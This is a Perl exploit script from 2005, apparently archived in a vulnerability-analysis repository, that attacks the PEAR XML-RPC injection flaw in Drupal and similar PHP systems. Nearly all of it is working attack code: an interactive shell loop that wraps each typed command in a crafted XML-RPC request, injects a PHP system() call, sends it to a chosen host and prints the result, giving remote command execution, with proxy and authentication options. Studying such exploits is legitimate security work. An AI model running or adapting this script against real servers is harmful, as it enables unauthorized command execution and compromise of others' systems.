lilbool/vuln-code-analysis
0
1# tested and working /str0ke
2
3#!/usr/bin/perl
4#
5# ilo--
6#
7# This program is no GPL or has nothing to do with FSF, but some
8# code was ripped from romansoft.. sorry, too lazy!
9#
10# xmlrpc bug by James from GulfTech Security Research.
11# http://pear.php.net/bugs/bug.php?id=4692
12# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
13# cms should be vulnerable.
14#
15# greets: dsr! digitalsec.net
16#
17require LWP::UserAgent;
18use URI;
19use Getopt::Long;
20use strict;
21$| = 1; # fflush stdout after print
22
23# Default options
24# connection
25my $basic_auth_user = '';
26my $basic_auth_pass = '';
27my $proxy = '';
28my $proxy_user = '';
29my $proxy_pass = '';
30my $conn_timeout = 15;
31
32# general
33my $host;
34
35 #informational lines to feed my own ego.
36 print "xmlrpc exploit - http://www.reversing.org \n";
37 print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
38 print "special chars allowed are / and - \n\n";
39
40 # read command line options
41 my $options = GetOptions (
42
43 #general options
44 'host=s' => \$host, # input host to test.
45
46 # connection options
47 'basic_auth_user=s' => \$basic_auth_user,
48 'basic_auth_pass=s' => \$basic_auth_pass,
49 'proxy=s' => \$proxy,
50 'proxy_user=s' => \$proxy_user,
51 'proxy_pass=s' => \$proxy_pass,
52 'timeout=i' => \$conn_timeout);
53
54 # command line sanity check
55 &show_usage unless ($host);
56
57 # main loop
58 while (1){
59 print "\nxmlrpc@# ";
60 my $cmd = <STDIN>;
61 xmlrpc_xploit ($cmd);
62 }
63
64 exit (1);
65
66#exploit
67sub xmlrpc_xploit {
68chomp (my $data = shift);
69my $reply;
70
71my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";
72my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";
73
74 $data =~ s/-/'.chr(45).'/mg;
75 $data =~ s/\//'.char(47).'/mg;
76
77 my $req = new HTTP::Request 'POST' => $host;
78 $req->content_type('application/xml');
79 $req->content($d1.'system(\''.$data.'\')'.$d2);
80
81 my $ua = new LWP::UserAgent;
82 $ua->agent("xmlrpc exploit R/0.1");
83 $ua->timeout($conn_timeout);
84
85 if ($basic_auth_user){
86 $req->authorization_basic($basic_auth_user, $basic_auth_pass)
87 }
88 if ($proxy){
89 $ua->proxy(['http'] => $proxy);
90 $req->proxy_authorization_basic($proxy_user, $proxy_pass);
91 }
92
93 #send request, return null if not OK
94 my $res = $ua->request($req);
95 if ($res->is_success){
96 $reply= $res->content;
97 } else {
98 $reply = "";
99 }
100 $reply =~ /(.*).(<pre>warning.*)/mgsi;
101 print ($1);
102}
103
104# show options
105sub show_usage {
106 print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
107 print "main options\n";
108 print "connection options\n";
109 print "\t--proxy (http), --proxy_user, --proxy_pass\n";
110 print "\t--basic_auth_user, --basic_auth_pass\n";
111 print "\t--timeout \n";
112 print "\nExample\n";
113 print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
114 print "\n";
115 exit(1);
116}
117
118
119# milw0rm.com [2005-07-01]